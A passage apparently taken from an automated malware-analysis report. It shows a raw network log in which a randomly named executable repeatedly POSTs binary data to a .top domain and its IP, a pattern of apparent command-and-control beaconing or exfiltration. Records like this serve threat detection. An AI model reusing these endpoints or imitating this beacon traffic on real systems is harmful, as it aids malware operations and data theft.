                                                          Content-Length: 152
                                                          Connection: keep-alive


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          94 | 192.168.2.4 | 64784 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:23.260252953 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:23.928229094 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:24.131973982 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:23 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          95 | 192.168.2.4 | 64785 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:24.263524055 CEST | 295 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:24.944761038 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:25.076587915 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:24 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          96 | 192.168.2.4 | 64786 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:25.202526093 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:25.866633892 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:25.996840954 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:25 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          97 | 192.168.2.4 | 64787 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:26.121084929 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:26.782145977 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:26.916110039 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:26 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          98 | 192.168.2.4 | 64788 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:27.062130928 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:27.753386974 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:27.884740114 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:27 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.4 | 64789 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:28.012454033 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2532
Expect: 100-continue
Connection: Keep-Alive
Sep 8, 2024 11:53:28.369024992 CEST | 2532 | OUT | [request body]
Sep 8, 2024 11:53:28.677365065 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:28.804590940 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:53:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3f 59 5f 5a
Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.4 | 64790 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:28.933787107 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2532
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.4 | 64791 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:29.017903090 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 1412
Expect: 100-continue
Connection: Keep-Alive
Sep 8, 2024 11:53:29.368956089 CEST | 1412 | OUT | [request body]
Sep 8, 2024 11:53:29.691461086 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:29.822422028 CEST | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:53:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.4 | 64792 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:29.138989925 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2532
Expect: 100-continue
Connection: Keep-Alive
Sep 8, 2024 11:53:29.494157076 CEST | 2532 | OUT | [request body]
Sep 8, 2024 11:53:29.825006962 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:29.960515022 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:53:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3f 59 5f 5a
Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.4 | 64793 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:30.091845036 CEST | 295 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2532
Expect: 100-continue
Sep 8, 2024 11:53:30.448311090 CEST | 2532 | OUT | [request body]
Sep 8, 2024 11:53:30.764965057 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:30.900378942 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:53:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3f 59 5f 5a
Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.4 | 64794 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:31.031528950 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2532
Expect: 100-continue
Connection: Keep-Alive
Sep 8, 2024 11:53:31.384638071 CEST | 2532 | OUT | [request body]
Sep 8, 2024 11:53:31.716950893 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:31.848675013 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:53:31 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3f 59 5f 5a
Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.4 | 64795 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:31.981065035 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2532
Expect: 100-continue
Connection: Keep-Alive
Sep 8, 2024 11:53:32.337816954 CEST | 2532 | OUT | [request body]
Sep 8, 2024 11:53:32.646858931 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:32.776804924 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:53:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3f 59 5f 5a
Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.4 | 64796 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:32.908288956 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2532
Expect: 100-continue
Connection: Keep-Alive
Sep 8, 2024 11:53:33.259749889 CEST | 2532 | OUT | [request body]
Sep 8, 2024 11:53:33.609750986 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:33.750930071 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:53:33 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3f 59 5f 5a
Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.4 | 64797 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:33.871974945 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2532
Expect: 100-continue
Connection: Keep-Alive
Sep 8, 2024 11:53:34.228385925 CEST | 2532 | OUT | [request body]
Sep 8, 2024 11:53:34.541845083 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:34.669367075 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:53:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3f 59 5f 5a
Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.4 | 64798 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:34.797240973 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2532
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
109 | 192.168.2.4 | 64799 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:34.846730947 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 1412
Expect: 100-continue
Connection: Keep-Alive
Sep 8, 2024 11:53:35.197118044 CEST | 1412 | OUT | [request body]
Sep 8, 2024 11:53:35.530359983 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:35.668539047 CEST | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:53:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
110 | 192.168.2.4 | 64800 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:34.965585947 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2532
Expect: 100-continue
Connection: Keep-Alive
Sep 8, 2024 11:53:35.322144032 CEST | 2532 | OUT | [request body]
Sep 8, 2024 11:53:35.665493011 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:35.798425913 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:53:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3f 59 5f 5a
Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
111 | 192.168.2.4 | 64801 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:35.919670105 CEST | 295 | OUT | POST /jspollgamesqldle.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 304550cm.n9shka.top
Content-Length: 2532
Expect: 100-continue
Sep 8, 2024 11:53:36.275186062 CEST | 2532 | OUT | [request body]
Sep 8, 2024 11:53:36.585618973 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:36.712651968 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 09:53:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3f 59 5f 5a
Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
112 | 192.168.2.4 | 64802 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:36.842149973 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
Sep 8, 2024 11:53:37.530374050 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:37.721091986 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
113 | 192.168.2.4 | 64803 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:37.854850054 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
Sep 8, 2024 11:53:38.523876905 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:38.729684114 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:38 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
114 | 192.168.2.4 | 64804 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:38.859571934 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
Sep 8, 2024 11:53:39.555705070 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:39.690282106 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:39 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
115 | 192.168.2.4 | 64805 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:39.809109926 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
Sep 8, 2024 11:53:40.470690012 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:40.679898977 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:40 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
116 | 192.168.2.4 | 64806 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:40.688564062 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
Sep 8, 2024 11:53:41.381690025 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:41.584310055 CEST | 308 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:40 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
117 | 192.168.2.4 | 64807 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:40.813303947 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
Sep 8, 2024 11:53:41.504595041 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:41.637006044 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:41 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
118 | 192.168.2.4 | 64808 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:41.761765957 CEST | 295 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
Sep 8, 2024 11:53:42.435806036 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:42.570348978 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:41 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
119 | 192.168.2.4 | 64809 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:42.705200911 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
Sep 8, 2024 11:53:43.370001078 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:43.500572920 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:42 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
120 | 192.168.2.4 | 64810 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 11:53:43.626348019 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
Sep 8, 2024 11:53:44.293169022 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 8, 2024 11:53:44.416728973 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
